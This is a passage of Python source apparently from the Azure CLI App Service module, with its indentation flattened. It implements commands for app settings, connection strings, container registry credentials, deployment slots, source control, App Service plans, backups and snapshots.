slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p].value,
'type':result.properties[p].type,
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
try:
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
except StopIteration:
pass
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
lower_custom_image_name = custom_image_name.lower()
if "https://" in lower_custom_image_name or "http://" in lower_custom_image_name:
custom_image_name = lower_custom_image_name.replace("https://", "").replace("http://", "")
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
if not web_app:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
linux_fx = fx_version if (web_app.reserved or not web_app.is_xenon) else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any(linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
# Decode base64 encoded byte array into string
return b64encode(config_file_bytes).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
# pylint: disable=unused-argument
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None,
windows_fx_version=None, pre_warmed_instance_count=None, php_version=None,
python_version=None, net_framework_version=None,
java_version=None, java_container=None, java_container_version=None,
remote_debugging_enabled=None, web_sockets_enabled=None,
always_on=None, auto_heal_enabled=None,
use32_bit_worker_process=None,
min_tls_version=None,
http20_enabled=None,
app_command_line=None,
ftps_state=None,
vnet_route_all_enabled=None,
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
if pre_warmed_instance_count is not None:
pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count,
min_val=0, max_val=20)
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled', 'vnet_route_all_enabled']
int_flags = ['pre_warmed_instance_count', 'number_of_workers']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if arg in int_flags and values[arg] is not None:
values[arg] = validate_and_convert_to_int(arg, values[arg])
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
# https://github.com/Azure/azure-cli/issues/14857
updating_ip_security_restrictions = False
result = {}
for s in generic_configurations:
try:
json_object = get_json_object(s)
for config_name in json_object:
if config_name.lower() == 'ip_security_restrictions':
updating_ip_security_restrictions = True
result.update(json_object)
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
if config_name.lower() == 'ip_security_restrictions':
updating_ip_security_restrictions = True
setattr(configs, config_name, value)
if not updating_ip_security_restrictions:
setattr(configs, 'ip_security_restrictions', None)
setattr(configs, 'scm_ip_security_restrictions', None)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
return result.properties
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
if value[0] in ["'", '"']: # strip away the quots used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
from azure.mgmt.web.models import HostNameBinding
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name=resource_group_name,
name=webapp.name, host_name=hostname,
host_name_binding=binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name=resource_group_name,
name=webapp.name, host_name=hostname,
slot=slot, host_name_binding=binding)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
SslState = cmd.get_models('SslState')
# logics here are ported from portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
Site, SiteConfig, NameValuePair = cmd.get_models('Site', 'SiteConfig', 'NameValuePair')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
site_config = get_site_configs(cmd, resource_group_name, webapp, None)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
if 'functionapp' in site.kind:
raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
slot_def.site_config = SiteConfig()
# if it is a Windows Container site, at least pass the necessary
# app settings to perform the container image validation:
if configuration_source and site_config.windows_fx_version:
# get settings from the source
clone_from_prod = configuration_source.lower() == webapp.lower()
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings', src_slot)
settings = []
for k, v in app_settings.properties.items():
if k in ("DOCKER_REGISTRY_SERVER_USERNAME", "DOCKER_REGISTRY_SERVER_PASSWORD",
"DOCKER_REGISTRY_SERVER_URL"):
settings.append(NameValuePair(name=k, value=v))
slot_def.site_config = SiteConfig(app_settings=settings)
poller = client.web_apps.begin_create_or_update_slot(resource_group_name, webapp, site_envelope=slot_def, slot=slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
Site = cmd.get_models('Site')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' function app doesn't exist".format(name))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
poller = client.web_apps.begin_create_or_update_slot(resource_group_name, name, site_envelope=slot_def, slot=slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings, slot, client)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, github_action=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'), is_git_hub_action=bool(github_action))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'begin_create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
# for non server errors(50x), just throw; otherwise retry 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
Update source control token cached in Azure app service. If no token is provided,
the command will clean up existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
site_config = get_site_configs(cmd, resource_group_name, name, slot)
site_config.scm_type = 'LocalGit'
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update_configuration', slot, site_config)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites"
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
app_service_environment=None, sku='B1', number_of_workers=None, location=None,
tags=None, no_wait=False, zone_redundant=False):
HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models(
'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan')
client = web_client_factory(cmd.cli_ctx)
if app_service_environment:
if hyper_v:
raise ArgumentUsageError('Windows containers is not yet supported in app service environment')
ase_list = client.app_service_environments.list()
ase_found = False
ase = None
for ase in ase_list:
if ase.name.lower() == app_service_environment.lower() or ase.id.lower() == app_service_environment.lower():
ase_def = HostingEnvironmentProfile(id=ase.id)
location = ase.location
ase_found = True
break
if not ase_found:
err_msg = "App service environment '{}' not found in subscription.".format(app_service_environment)
raise ResourceNotFoundError(err_msg)
else: # Non-ASE
ase_def = None
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
# TODO use zone_redundant field on ASP model when we switch to SDK version 5.0.0
if zone_redundant:
plan_def.enable_additional_properties_sending()
existing_properties = plan_def.serialize()["properties"]
plan_def.additional_properties["properties"] = existing_properties
plan_def.additional_properties["properties"]["zoneRedundant"] = True
if number_of_workers is None:
sku_def.capacity = 3
else:
sku_def.capacity = max(3, number_of_workers)
return sdk_no_wait(no_wait, client.app_service_plans.begin_create_or_update, name=name,
resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None):
if number_of_workers is None and sku is None:
logger.warning('No update is done. Specify --sku and/or --number-of-workers.')
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
instance.sku = sku_def
return instance
def show_plan(cmd, resource_group_name, name):
from azure.cli.core.commands.client_factory import get_subscription_id
client = web_client_factory(cmd.cli_ctx)
serverfarm_url_base = 'subscriptions/{}/resourceGroups/{}/providers/Microsoft.Web/serverfarms/{}?api-version={}'
subscription_id = get_subscription_id(cmd.cli_ctx)
serverfarm_url = serverfarm_url_base.format(subscription_id, resource_group_name, name, client.DEFAULT_API_VERSION)
request_url = cmd.cli_ctx.cloud.endpoints.resource_manager + serverfarm_url
response = send_raw_request(cmd.cli_ctx, "GET", request_url)
return response.json()
def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
instance = update_app_service_plan(instance, sku, number_of_workers)
if max_burst is not None:
if not is_plan_elastic_premium(cmd, instance):
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
instance.maximum_elastic_worker_count = max_burst
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
number_of_workers, min_val=0, max_val=20)
return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups', slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
BackupRequest = cmd.get_models('BackupRequest')
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_request = BackupRequest(backup_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
BackupSchedule, BackupRequest = cmd.get_models('BackupSchedule', 'BackupRequest')
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
RestoreRequest = cmd.get_models('RestoreRequest')
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest')
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
